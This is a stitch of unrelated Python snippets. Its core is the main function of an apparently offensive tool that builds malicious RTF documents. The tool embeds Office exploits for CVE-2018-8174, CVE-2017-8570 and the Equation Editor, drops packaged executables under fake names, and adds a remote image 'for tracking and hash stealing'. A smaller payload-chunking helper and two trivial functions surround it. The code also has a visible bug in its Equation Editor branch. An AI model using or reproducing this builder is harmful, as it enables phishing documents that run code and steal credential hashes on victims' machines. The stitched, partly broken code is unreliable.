def write_to_tempfile(kls, data_uri): ''' *placeholder method* this method will create a new TempFile (or cStringIO) with the contents of the data_uri which can then be POST'ed to kobocat in a mock submission. ''' (ftype, fext, fcont) = kls._attachment_split(data_uri) fname = 'a%s.%s' % (randstr(10), fext) return (fname, '/tmp/path/to/%s' % fname)
def _replace(self, match): if match.group('integer') and match.group('integer_mult_start'): start = int(match.group('integer_mult_start')) end = start if match.group('integer_mult_end'): end = int(match.group('integer_mult_end')) return utils.randstr(end, start, string.digits) elif match.group('character') and match.group('character_mult_start'): start = int(match.group('character_mult_start')) end = start if match.group('character_mult_end'): end = int(match.group('character_mult_end')) return utils.randstr(end, start, string.ascii_lowercase) elif match.group('domain'): return random.choice(['it', 'es', 'uk', 'en', 'com']) elif match.group('payload'): current_payload = (self.start_delimiter + self.chunked_payload.next() + self.end_delimiter) start = int(match.group('payload_mult_start')) # Eventually add padding if current_payload is smaller than minsize if len(current_payload) < start: padding_length = start - len(current_payload) current_payload += utils.randstr(padding_length, padding_length, string.letters) return current_payload
def main(): parser = argparse.ArgumentParser() parser.add_argument('-D', '--debug', action='store_true', help='enable debug') parser.add_argument('-l', '--list', action='store_true', help='list exploits and additions') parser.add_argument('-u', '--use', action='append', help='add exploit (see --list)') parser.add_argument('--use-cve', action='append', help='add exploit (by CVE)') parser.add_argument('--exe-name', help='name for dropped EXE file (for exploits equation and composite)') parser.add_argument('--template', default=utils.basedir(default_rtf), help='RTF template to add exploit to (default: {})'.format(default_rtf)) parser.add_argument('--fake-path', default=default_fakepath, help='fake path for packaged files (default: {})'.format(default_fakepath)) parser.add_argument('-o', '--out', help='RTF output') king = parser.add_argument_group('king exploit', 'King exploit (CVE-2018-8174) options') king.add_argument('--king-shellcode', default=utils.basedir(default_king_shellcode), help='shellcode for CVE-2018-8174 (default: {})'.format(default_king_shellcode)) king.add_argument('--king-url', help='URL where HTML will be hosted for king exploit (max: 39 chars)') king.add_argument('--king-html-out', help='output file for king HTML') composite = parser.add_argument_group('composite exploit', 'Composite moniker exploit (CVE-2017-8570) options') composite.add_argument('--composite-sct', help='use this SCT file instead of generating one') additions = parser.add_argument_group('additions', 'Additional things to add to the RTF') additions.add_argument('--image-track', help='include an image from this URL, for tracking and hash stealing') additions.add_argument('-p', '--package', action='append', help='files to add as packages. will by dropped in temp (append fake name with colon)') args = parser.parse_args() # -D/--debug utils.enable_debug = args.debug # -l/--list if args.list: print('exploits (use with --use):') for exploit, cve in exploit_to_cve.items(): print(' - {} ({})'.format(exploit, cve)) print() print('additions:') print(' - image tracking and hash stealing (use with --image-track)') print(' - embed file as package to be dropped in %temp% (use with --package)') sys.exit() # read original rtf with open(args.template, 'r') as fp: rtf = fp.read() # remove last } rtf = rtf.rstrip() if rtf[-1] != '}': bye('} must be the last character of the rtf') rtf = rtf[:-1] rtf += '\n' * 3 # use these exploits used = [] if args.use: # -u/--use for item in args.use: for exploit in item.split(','): exploit = exploit.lower() if exploit == 'all': # use all exploits used += supported_exploits else: # check to make sure it exists if exploit not in supported_exploits: bye('unknown exploit: {}'.format(exploit)) used.append(exploit) else: # defaults used = default_exploits # --use-cve if args.use_cve: for item in args.use_cve: for cve in item.split(','): cve = cve.lower() # check to make sure it exists if cve not in cve_to_exploit: bye('unknown CVE: {}'.format(cve)) used.append(cve_to_exploit[cve]) # sort the exploits by reliability used = list(set(used)) used = sorted(used, key=lambda x: supported_exploits.index(x)) # embed packages packages = None if args.package: packages = parse_packages(args.package) for package, fakename in packages: package = rtf_package.Package(package, fakename=fakename, fakepath=args.fake_path) rtf += package.build_package() # track with image (--image-track) if args.image_track: yes('adding image track: {}'.format(args.image_track)) rtf += generate_image(args.image_track) # generate exploits for exploit in used: yes('adding exploit {} ({})'.format(exploit, exploit_to_cve[exploit])) if exploit == 'king': # check args if not args.king_url: bye('specify --king-url') if not args.king_html_out: bye('specify --king-html-out') # if using the default shellcode, make sure it'll work if args.king_shellcode == utils.basedir(default_king_shellcode): if (args.exe_name and args.exe_name != default_king_exe_name) or \ not check_packages(packages, default_king_exe_name): bye('the default king shellcode expects an executable named {} to be packaged'.format(default_king_exe_name)) # make rtf part rtf_part = exploits.king.generate_rtf(args.king_url) if not rtf_part: bye('king url too long: {}'.format(args.king_url)) rtf += rtf_part # read shellcode with open(args.king_shellcode, 'rb') as fp: shellcode = fp.read() # make html part html = exploits.king.generate_html(shellcode) # output html ok('writing king html to {}'.format(args.king_html_out)) ok('rtf will retrive king exploit from {}'.format(args.king_url)) with open(args.king_html_out, 'w+') as fp: fp.write(html) elif exploit in ['equation1', 'equation2']: if not check_packages(packages, args.exe_name): bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name)) # exe name is --exe-name or the package if there's only one exe_name = args.exe_name if args.exe_name else packages[0][1] if exploit == 'equation2': rtf += exploits.equation.generate_rtf1(exe_name) elif exploit == 'equation2': rtf += exploits.equation.generate_rtf2(exe_name) elif exploit == 'composite': if not check_packages(packages, args.exe_name): bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name)) # exe name is --exe-name or the package if there's only one exe_name = args.exe_name if args.exe_name else packages[0][1] # add SCT if needed with tempfile.NamedTemporaryFile() as temp: sct_name = utils.randstr(15, 15) + '.sct' if args.composite_sct: # use user SCT package = rtf_package.Package(args.composite_sct, fakename=sct_name, fakepath=args.fake_path) rtf += package.build_package() else: # build an SCT sct = exploits.composite.generate_sct(exe_name) temp.write(sct.encode()) temp.flush() package = rtf_package.Package(temp.name, fakename=sct_name, fakepath=args.fake_path) rtf += package.build_package() rtf += exploits.composite.generate_rtf(sct_name) else: raise RuntimeError('unknown exploit') # add back an enclosing } rtf += '}\n' # write new rtf if args.out: ok('writing rtf to {}'.format(args.out)) with open(args.out, 'w+') as fp: fp.write(rtf) else: bye('specify output RTF file with --out')
def gen_chat_name(command): if command == '.random': return utils.randstr(10) else: return command[1:-1]